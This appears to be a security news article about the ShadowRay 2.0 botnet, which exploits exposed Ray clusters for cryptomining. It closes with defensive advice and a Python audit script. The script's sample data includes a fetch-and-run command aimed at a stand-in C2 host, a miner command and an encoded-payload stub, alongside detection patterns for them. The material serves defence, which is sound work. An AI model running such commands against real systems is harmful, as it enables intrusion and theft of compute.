A sophisticated botnet campaign dubbed ShadowRay 2.0 is actively targeting exposed Ray Clusters across the globe, converting compromised infrastructure into cryptomining nodes. Threat actors have weaponized a known code execution vulnerability to launch a wormable attack capable of self-replication and propagation between cloud and on-premises environments.
ShadowRay 2.0 Leverages Known Vulnerability for Widespread Exploitation
The new campaign marks an escalation in abuse of the Ray distributed computing framework, an open-source platform widely deployed by developers for training large-scale AI models and machine learning workloads.
Vulnerability Allows Unauthenticated Remote Code Execution
The attackers exploit a known security flaw introduced in Ray version 1.0.0 and patched quietly in version 2.4.0. This vulnerability allows unauthenticated remote code execution (RCE) on Ray Clusters that have been deployed without protective network segmentation or authentication. The flaw existed for nearly three years, leaving thousands of deployments potentially vulnerable in that window. According to security researchers, the root cause lies in the unrestricted nature of Ray’s job submission API over port 8265, which accepts arbitrary Python code without verification under certain configurations.
Thousands of Publicly Exposed Ray Nodes Identified
Security scans have revealed that over 5,000 Ray nodes remain publicly accessible on the internet, many of which are deployed on cloud infrastructure. These internet-exposed clusters present ideal entry points for an attacker looking to expand their cryptomining capabilities. Once a node is compromised, ShadowRay 2.0 scripts identify additional vulnerable clusters and spread laterally using the same exploit, creating a self-propagating botnet.
Novel Features in ShadowRay 2.0 Enhance Persistence and Propagation
Researchers investigating ShadowRay 2.0 note significant advancements compared to its predecessor campaign, ShadowRay, which first emerged in late 2023. The upgraded variant employs stealthier mechanisms for payload delivery, maintains control via persistent backdoors, and includes automated propagation logic tailored to mixed environments.
Enhanced Cryptomining Operations With Obfuscation and Resilience
The cryptomining payload, delivered post-infection, installs XMRig—an open-source Monero mining application—configured to run under obfuscated process names. Scheduled tasks and cron jobs enable persistence across host reboots, while basic evasion tactics help avoid some monitoring tools. Additionally, the botnet communicates with anonymized command-and-control (C2) infrastructure, complicating attribution and takedown efforts.
Propagation Logic Bridges Cloud and Local Systems
Notably, ShadowRay 2.0 is designed to thrive in hybrid environments. The malware's propagation logic detects new potential targets within private networks, such as adjacent cloud VMs or local data center nodes. If those remote Ray Clusters lack authentication or firewall protection, they too become part of the botnet through automated script execution. This behavior introduces significant risk for organizations that use Ray for large-scale AI processing but neglect internal segmentation and hardening.
Recommendations to Secure Ray Cluster Deployments
Given the active threat posed by ShadowRay 2.0, organizations should review their distributed application and container security practices, particularly those relying on Ray.
Immediate Action Items for Defenders
Security teams should consider the following steps to protect against current and future variants of the ShadowRay campaign:
- Upgrade Ray to version 2.4.0 or higher, where the RCE flaw was patched.
- Remove public exposure of Ray Dashboard and head node APIs, particularly over port 8265.
- Enforce authentication and role-based access control (RBAC) for job submissions.
- Implement firewall rules and VPC (Virtual Private Cloud) segmentation to block unauthorized inbound connections.
- Monitor for unusual traffic patterns that could indicate botnet communication or lateral scanning.
Proactive detection can also benefit from intrusion detection systems (IDS) that recognize signs of XMRig execution, unexpected Python interpreter behavior, or suspicious curl/wget calls in Ray environment logs.
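As an added example (not code from the article or from the Ray project), the following Python audit logic applies two of the checks above to constructed input: it flags submitted jobs whose entrypoint shows the downloader, pipe-to-shell, encoded-payload or miner traits the article lists, and it checks whether a `ray start` command line binds the dashboard/job API on port 8265 to a non-loopback address. The job-record shape (`submission_id`, `status`, `entrypoint`) is assumed from Ray's job listing API, and every sample value, including the `.invalid` hostnames, is constructed.

```python
import json
import re
import shlex

# Constructed sample of a `GET /api/jobs/` response from a Ray head node,
# trimmed to the fields this check reads. Not real incident data.
SAMPLE_JOBS_JSON = json.dumps([
    {"submission_id": "raysubmit_1", "status": "SUCCEEDED",
     "entrypoint": "python train.py --epochs 10"},
    {"submission_id": "raysubmit_2", "status": "RUNNING",
     "entrypoint": "curl -s http://c2.invalid/setup.sh | sh"},
    {"submission_id": "raysubmit_3", "status": "RUNNING",
     "entrypoint": "python -c 'import base64,os; ...'"},
    {"submission_id": "raysubmit_4", "status": "RUNNING",
     "entrypoint": "./xmrig -o stratum+tcp://pool.invalid:3333"},
])

# Entrypoint traits matching the behaviour the article describes: downloader
# calls, pipe-to-shell, encoded inline Python, a miner binary or pool protocol.
SUSPICIOUS_PATTERNS = {
    "downloader": re.compile(r"\b(curl|wget)\b"),
    "pipe_to_shell": re.compile(r"\|\s*(sh|bash)\b"),
    "inline_python": re.compile(r"\bpython[23]?\s+-c\b"),
    "encoded_payload": re.compile(r"\bbase64\b"),
    "miner": re.compile(r"\bxmrig\b|stratum\+tcp://"),
}

def flag_suspicious_jobs(jobs_json: str) -> list:
    """One finding per job whose submitted entrypoint matches any pattern."""
    findings = []
    for job in json.loads(jobs_json):
        entry = job.get("entrypoint", "")
        hits = [n for n, rx in SUSPICIOUS_PATTERNS.items() if rx.search(entry)]
        if hits:
            findings.append({"submission_id": job["submission_id"],
                             "status": job.get("status"), "hits": hits})
    return findings

def dashboard_exposed(ray_start_cmdline: str) -> bool:
    """True if `ray start --head ...` binds the dashboard/job API (port 8265)
    to a non-loopback address; --dashboard-host defaults to 127.0.0.1."""
    argv = shlex.split(ray_start_cmdline)
    host = "127.0.0.1"
    for i, arg in enumerate(argv):
        if arg.startswith("--dashboard-host="):
            host = arg.split("=", 1)[1]
        elif arg == "--dashboard-host" and i + 1 < len(argv):
            host = argv[i + 1]
    return host not in ("127.0.0.1", "localhost", "::1")
```

Feeding `flag_suspicious_jobs` the live job list from your own head node turns this into a periodic check that complements network-level IDS signatures.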
A Cautionary Tale for AI Infrastructure Operators
The ShadowRay 2.0 campaign underscores the critical importance of securing distributed AI infrastructure, especially open-source platforms that simplify job execution and orchestration. As organizations accelerate machine learning workloads in production, they must also modernize their operational defenses.
Leaving Ray Clusters exposed or misconfigured can open the door to threats not just from botnets, but from advanced persistent threats (APTs) seeking access to high-performance compute resources. While ShadowRay 2.0 primarily monetizes victims through cryptojacking, its propagation mechanics could be repurposed for espionage or destructive purposes.
With the rapid growth of AI-native deployments, defenders face increasing pressure to secure frameworks like Ray at both the software and network layers. The ongoing evolution of ShadowRay hints that threat actors have recognized—and intend to exploit—that pressure.